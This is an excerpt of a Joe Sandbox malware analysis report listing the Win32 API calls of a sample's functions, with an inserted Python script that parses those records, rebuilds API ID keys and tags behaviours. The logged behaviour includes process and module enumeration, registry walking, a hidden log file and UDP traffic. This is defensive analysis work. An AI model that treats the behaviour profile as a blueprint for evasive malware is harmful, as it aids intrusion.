                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F41E7759006199FEB24CF68CC88FEB7B75AF48B06F40C589E60997264D735EA86CF10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01440D32
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01440D4B
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,-00000F68), ref: 01440D6D
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000098,00000000,00000000), ref: 01440D88
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(-0000008E,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01440DCC
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01440DE1
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00010170), ref: 01440DFF
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00011170,00000000,00000000), ref: 01440E1A
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01440E46
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01440E50
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01440E5A
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01440E64
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Global$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 675253578-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4c868344a8b40423c539794164330a880d5150a441122ef5b286bc878572fb11
                                                                                                                                                                                                                                                                                            • Instruction ID: 468c8b185334721e1f029585e72f2958f75d78074349d74bc12296fa756c110f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c868344a8b40423c539794164330a880d5150a441122ef5b286bc878572fb11
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B54119B4E00209EBEB20DFE4D889FAFBB74AB48B01F204549F711A7294D7B45650CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000,?,?,?,00000000,01448090,01433FF8,000000FF,?,01443AFC,80000001), ref: 014417D9
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 014417F8
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0144181A
                                                                                                                                                                                                                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 01441894
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014418C4
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 014418D0
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 01441912
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 01441928
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID: %s%s
                                                                                                                                                                                                                                                                                            • API String ID: 1665585142-3252725368
                                                                                                                                                                                                                                                                                            • Opcode ID: cc8fbc8f5475c0c035e840a119f0a60146c5c1af03c4f988f345f6be5f024be8
                                                                                                                                                                                                                                                                                            • Instruction ID: 33ba4fda3c4ff5fa71993c480fee8ad2ccf8129f8695a16521be462b042219fe
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc8fbc8f5475c0c035e840a119f0a60146c5c1af03c4f988f345f6be5f024be8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E515575D00219AFDB20DFA4DC59BEEB7B4FB4C704F004299E609A7290D7796A85CF50
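The records above and the Toolhelp process-walk record that follows each list the Win32 calls of one function, and the Similarity block condenses that list into an "API ID" that can be used to pivot between reports. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses records in the form shown on this page, rebuilds the API ID with a grouping rule inferred from the three complete records here (camel-case tokens are counted, grouped by count, tiers joined with "$" in descending order; the stop-word set is an assumption that makes those three records reproduce, not a documented Joe Sandbox rule), decodes the hex Sleep arguments to milliseconds, and tags the behaviours an analyst would pull out by hand (Toolhelp process enumeration, registry value walk, whole-file read into a heap buffer). The three sample records are copied from this page; the behaviour labels are the example's own.

```python
"""Rebuild Joe Sandbox "API ID" keys and tag behaviours from per-function
API call lists (added example; the grouping rule and stop words are inferred
from this page, not taken from Joe Sandbox documentation)."""
import re
from collections import Counter

# Sample input: records copied from this report, one call per line.
FILE_READ_RECORD = """
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01440D32
• GetFileSize.KERNEL32(000000FF,00000000), ref: 01440D4B
• GlobalAlloc.KERNEL32(00000040,-00000F68), ref: 01440D6D
• ReadFile.KERNEL32(000000FF,00000000,00000098,00000000,00000000), ref: 01440D88
• CreateFileW.KERNEL32(-0000008E,80000000,00000001,00000000,00000003,00000020,00000000), ref: 01440DCC
• GetFileSize.KERNEL32(000000FF,00000000), ref: 01440DE1
• GlobalAlloc.KERNEL32(00000040,00010170), ref: 01440DFF
• ReadFile.KERNEL32(000000FF,00000000,00011170,00000000,00000000), ref: 01440E1A
• GlobalFree.KERNEL32(00000000), ref: 01440E46
• CloseHandle.KERNEL32(000000FF), ref: 01440E50
• GlobalFree.KERNEL32(00000000), ref: 01440E5A
• CloseHandle.KERNEL32(000000FF), ref: 01440E64
"""
REGISTRY_RECORD = """
• Sleep.KERNEL32(00001000,?,?,?,00000000,01448090,01433FF8,000000FF,?,01443AFC,80000001), ref: 014417D9
• wsprintfA.USER32 ref: 014417F8
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0144181A
• RegEnumValueA.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 01441894
• lstrlen.KERNEL32(?), ref: 014418C4
• lstrlen.KERNEL32(00000000), ref: 014418D0
• Sleep.KERNEL32(00000400), ref: 01441912
• RegCloseKey.ADVAPI32(?), ref: 01441928
"""
PROCESS_WALK_RECORD = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01439C94
• Process32First.KERNEL32(00000000,00000128), ref: 01439CDD
• CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 01439CF1
• Sleep.KERNEL32(00000400), ref: 01439D67
• Sleep.KERNEL32(00000400), ref: 01439DB2
• Process32Next.KERNEL32(00000000,00000128), ref: 01439DC6
• CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 01439DDA
• Sleep.KERNEL32(00000400), ref: 01439E25
• Sleep.KERNEL32(00000400), ref: 01439E9D
• CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01439EB3
"""

# One report line: optional bullet, optional "Part of subcall function X:" prefix,
# API.MODULE, optional "(args)" (wsprintfA has none), then "ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

def parse_calls(record):
    """Return [{'api','module','args','ref'}, ...] in report order; args stay as hex text."""
    calls = []
    for line in record.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": m.group("ref")})
    return calls

# Camel-case split that keeps trailing digits with the word (Process32, Toolhelp32)
# and leaves all-lowercase names (lstrlen, wsprintf) whole.
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*")
# Assumed stop words: A/W suffixes, Ex, and the Get/Reg/Key prefixes. This set
# reproduces the three records on this page; it is not a published Joe Sandbox list.
STOP_TOKENS = {"A", "W", "Ex", "Get", "Reg", "Key"}

def api_id(calls):
    """Count tokens across all calls, group by count (highest first), sort each
    group in code-point order and join the groups with '$'."""
    counts = Counter(tok for c in calls for tok in TOKEN_RE.findall(c["api"])
                     if tok not in STOP_TOKENS)
    tiers = {}
    for tok, n in counts.items():
        tiers.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(tiers[n])) for n in sorted(tiers, reverse=True))

def sleep_ms(calls):
    """Decode the first (hex) argument of every Sleep call; '?' arguments are skipped."""
    out = []
    for c in calls:
        if c["api"] == "Sleep" and c["args"]:
            try:
                out.append(int(c["args"][0], 16))
            except ValueError:
                pass
    return out

# Analyst heuristics (this example's own labels, not report signatures).
BEHAVIOURS = [
    ("process enumeration via Toolhelp snapshot",
     {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}),
    ("registry value enumeration", {"RegOpenKeyExA", "RegEnumValueA"}),
    ("whole-file read into a heap buffer", {"GetFileSize", "GlobalAlloc", "ReadFile"}),
]

def tag_behaviours(calls):
    """Return the labels whose required API set is fully present, plus total Sleep time."""
    names = {c["api"] for c in calls}
    tags = [label for label, needed in BEHAVIOURS if needed <= names]
    total = sum(sleep_ms(calls))
    if total:
        tags.append("sleeps %d ms in total" % total)
    return tags

if __name__ == "__main__":
    for name, rec in (("file read", FILE_READ_RECORD), ("registry", REGISTRY_RECORD),
                      ("process walk", PROCESS_WALK_RECORD)):
        calls = parse_calls(rec)
        print(name, api_id(calls), tag_behaviours(calls))
```

Running it prints the same three API IDs the report shows for these functions, which is the check that the inferred grouping rule holds; the Sleep decode makes the four 0x400 delays in the process walk visible as 4096 ms of total stalling, the kind of detail that matters when deciding how long a sandbox run must be.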
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01439C94
• Process32First.KERNEL32(00000000,00000128), ref: 01439CDD
• CharUpperA.USER32(?,00000000,00000128,00000002,00000000), ref: 01439CF1
• Sleep.KERNEL32(00000400), ref: 01439D67
• Sleep.KERNEL32(00000400), ref: 01439DB2
• Process32Next.KERNEL32(00000000,00000128), ref: 01439DC6
• CharUpperA.USER32(?,00000000,00000128,00000000,00000128,00000002,00000000), ref: 01439DDA
• Sleep.KERNEL32(00000400), ref: 01439E25
• Sleep.KERNEL32(00000400), ref: 01439E9D
• CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01439EB3
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: Sleep$CharProcess32Upper$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 3272108884-0
• Opcode ID: 7e788f559b8811382ab110f14ca0941f393c956719ee370c9159fd9ed01729e3
                                                                                                                                                                                                                                                                                            • Instruction ID: cc5bdda58f38a93a1e28be0b20ec24d9130a579b0ed3e57ee0295da1038d0f7a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e788f559b8811382ab110f14ca0941f393c956719ee370c9159fd9ed01729e3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F5192B1D001198BEB24EB24CC49BEAB775AFA8704F0441DAD609A7264D7B5AF81CF91
APIs
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• lstrcat.KERNEL32(?,01432490), ref: 01442C53
• lstrcpy.KERNEL32(00000000,00000000), ref: 01442D24
• lstrcat.KERNEL32(00000000,01433DFC), ref: 01442D86
• lstrcat.KERNEL32(00000000,01433E00), ref: 01442D98
• lstrcat.KERNEL32(00000000,01433E04), ref: 01442DC1
• lstrlen.KERNEL32(00000000,%s,01443658,?,?,?,?,?,?), ref: 01442DD7
  • Part of subcall function 01442A35: lstrlen.KERNEL32(00000000), ref: 01442A4E
  • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DE0), ref: 01442A7C
  • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DE4), ref: 01442AA2
  • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DE8), ref: 01442AB1
  • Part of subcall function 01442A35: lstrlen.KERNEL32(00000000), ref: 01442B0C
  • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DEC), ref: 01442B40
  • Part of subcall function 01442A35: lstrcat.KERNEL32(00000000,01433DF0), ref: 01442B66
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
• String ID: %s
• API String ID: 3361872186-3043279178
• Opcode ID: 0eea915f41d775d551cac3e56a39c126ad8030fb6ab27357af0c572f09b08287
• Instruction ID: 291df30de3c22e550716bf220d765ca3c7cb205c61511d74bac48080f0a7498e
• Opcode Fuzzy Hash: 0eea915f41d775d551cac3e56a39c126ad8030fb6ab27357af0c572f09b08287
• Instruction Fuzzy Hash: 38611AB5E001099BDB24DF65E841BEE77B1EFAC300F10817AE609D32A0DB749A55CF90
APIs
• CreateFileA.KERNEL32(C:\Windows\ueqe.log,40000000,00000002,00000000,00000004,00000080,00000000,?), ref: 01435507
• lstrcpy.KERNEL32(00000000,C:\Windows\ueqe.log), ref: 0143553A
• lstrlen.KERNEL32(00000000,00000000), ref: 0143554E
• WriteFile.KERNEL32(000000FF,01436958,00000000,?,00000000), ref: 01435599
• SetEndOfFile.KERNEL32(000000FF), ref: 014355A6
• CloseHandle.KERNEL32(000000FF), ref: 014355B3
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: File$CloseCreateHandleWritelstrcpylstrlen
• String ID: C:\Windows\ueqe.log
• API String ID: 3630773104-2585761192
• Opcode ID: 52fe99997b39023a49f0f80a6e8d27b0748ca9ed4cb2270fca5806df98d96977
• Instruction ID: a038e80f7c7a336d4c8664b8459281ee91bf667cb91e0c82ec9abaeb6ec36c8d
• Opcode Fuzzy Hash: 52fe99997b39023a49f0f80a6e8d27b0748ca9ed4cb2270fca5806df98d96977
• Instruction Fuzzy Hash: BD3171B5900318ABDB20DB64DC4DFDAB778AB58700F0046D9E719A7291DBB46A84CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?), ref: 01439BA2
                                                                                                                                                                                                                                                                                            • Module32First.KERNEL32(?,00000224), ref: 01439BC5
                                                                                                                                                                                                                                                                                            • CharUpperA.USER32(?,00000008,?,?), ref: 01439BDE
                                                                                                                                                                                                                                                                                            • Module32Next.KERNEL32(?,00000224), ref: 01439C2E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000008,?,?), ref: 01439C3E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Module32$CharCloseCreateFirstHandleNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                                                                                            • String ID: DWEBIO$DWEBLLIO
                                                                                                                                                                                                                                                                                            • API String ID: 3788218250-3981995823
                                                                                                                                                                                                                                                                                            • Opcode ID: fabb84534136f028f67f7d2bcb25c7bcb0f9777f6fa3d0694266e28bf1e9eb65
                                                                                                                                                                                                                                                                                            • Instruction ID: 3a2ca1f2d6b0aab9d34a568d0bc97633112b93e5784bb26da49496e6f8705ef3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fabb84534136f028f67f7d2bcb25c7bcb0f9777f6fa3d0694266e28bf1e9eb65
• Instruction Fuzzy Hash: A0219971900219ABEF20DBA5DC487DAB7F8AB5C304F0045DAE608A2250DB75DA85CF50
APIs
• htons.WS2_32(?), ref: 0143785A
  • Part of subcall function 0143719B: socket.WS2_32(00000002,00000002,00000011), ref: 01437203
  • Part of subcall function 0143719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0143726D
  • Part of subcall function 0143719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01437345
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 014378CA
• htons.WS2_32(?), ref: 014378E2
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01437940
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 014379DC
• sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01437A19
  • Part of subcall function 01436330: RtlEnterCriticalSection.NTDLL(01449050), ref: 014363CD
  • Part of subcall function 01436330: RtlLeaveCriticalSection.NTDLL(01449050), ref: 01436960
• GlobalFree.KERNEL32(00000000), ref: 01437A23
• RtlExitUserThread.NTDLL(00000000), ref: 01437A2B
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: sendto$CriticalSectionhtons$EnterExitFreeGlobalLeaveThreadUserselectsocket
• String ID:
• API String ID: 4130859867-0
• Opcode ID: 6600f0b7192b2e9ec62fd247a9e683ac2b6b6a4853a4bd9b2c5bf9d7e86320ce
• Instruction ID: dbb3fe084065a26b818b4a35e9ea701d1d8a9e5a108e5e10beb38e83ab2d3452
• Instruction Fuzzy Hash: F39191B1E00209BBEB14DBA4C885FEFF7B5EF8C701F148599E615AB291D7719A40CB50
APIs
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• lstrcpy.KERNEL32(00000000,00000000), ref: 01442D24
• lstrcat.KERNEL32(00000000,01433DFC), ref: 01442D86
• lstrcat.KERNEL32(00000000,01433E00), ref: 01442D98
• lstrcat.KERNEL32(00000000,01433E04), ref: 01442DC1
• lstrlen.KERNEL32(00000000,%s,01443658,?,?,?,?,?,?), ref: 01442DD7
• wsprintfA.USER32 ref: 01442DE5
• lstrcat.KERNEL32(?,00000000), ref: 01442DF9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: lstrcat$ExchangeInterlockedlstrcpylstrlenwsprintf
• String ID: %s
• API String ID: 3923932729-3043279178
• Opcode ID: 7921f2b51d346a6e7a4410acf44e6ec8b5e56c4c9c498cc793e5e8f6e0406534
• Instruction ID: bf842e825c283e599dca7d100a3b6fa87641fd56a53e3e7756f24cb0d76ab024
• Instruction Fuzzy Hash: 4D3135B6E001189BD728DF65EC45BE97372AFAC300F1085BAF209D2160DB749A95CFA0
APIs
• GetTickCount.KERNEL32 ref: 0143A6E6
• lstrlen.KERNEL32(?,014326B8,00000000), ref: 0143A6F8
• wsprintfA.USER32 ref: 0143A704
• GetTickCount.KERNEL32 ref: 0143A6C5
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• GetTickCount.KERNEL32 ref: 0143A70F
• GetTickCount.KERNEL32 ref: 0143A730
• lstrlen.KERNEL32(?,014326B0,00000000), ref: 0143A742
• wsprintfA.USER32 ref: 0143A74E
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CountTick$lstrlenwsprintf$ExchangeInterlocked
• String ID:
• API String ID: 2702386088-0
• Opcode ID: b36a9ef4d40acc4ed1ca016729689a58c38697bd98e2edebf13578094bd68089
• Instruction ID: e1c52bdc5b8a73af6327ffaff8c8a7821a933260bec9c12151c1ccdbbd4d99ee
• Instruction Fuzzy Hash: 1021D8766001056BD7249B75DC48EF677A9EF9D641B044529FF09C3364D635D800CBA0
APIs
• GetTempPathA.KERNEL32(00000080,?,?), ref: 0143A78C
• lstrlen.KERNEL32(?), ref: 0143A796
• lstrcat.KERNEL32(?,01433CC0), ref: 0143A7B2
• lstrcpy.KERNEL32(?,00000000), ref: 0143A7CF
• lstrlen.KERNEL32(?,01432880,?), ref: 0143A7FD
• wsprintfA.USER32 ref: 0143A809
• lstrlen.KERNEL32(?,0143288C,?), ref: 0143A826
• wsprintfA.USER32 ref: 0143A832
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$wsprintf$PathTemplstrcatlstrcpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2776683041-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a867369551eeba0368438df598bf981885676acdc0023b042cef3513b10a3521
                                                                                                                                                                                                                                                                                            • Instruction ID: 6a5fa851e9486ae353b8b4b09cc47cc7fcc857ccc90565785fe4b9bfb39533d8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a867369551eeba0368438df598bf981885676acdc0023b042cef3513b10a3521
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 502198B9600104AFD714CF78D884BEA7B79AF9DB00F008159FF4987254DB74D984CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 01436F1C
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 01436F7A
                                                                                                                                                                                                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 01437052
                                                                                                                                                                                                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 01437081
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 01437185
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
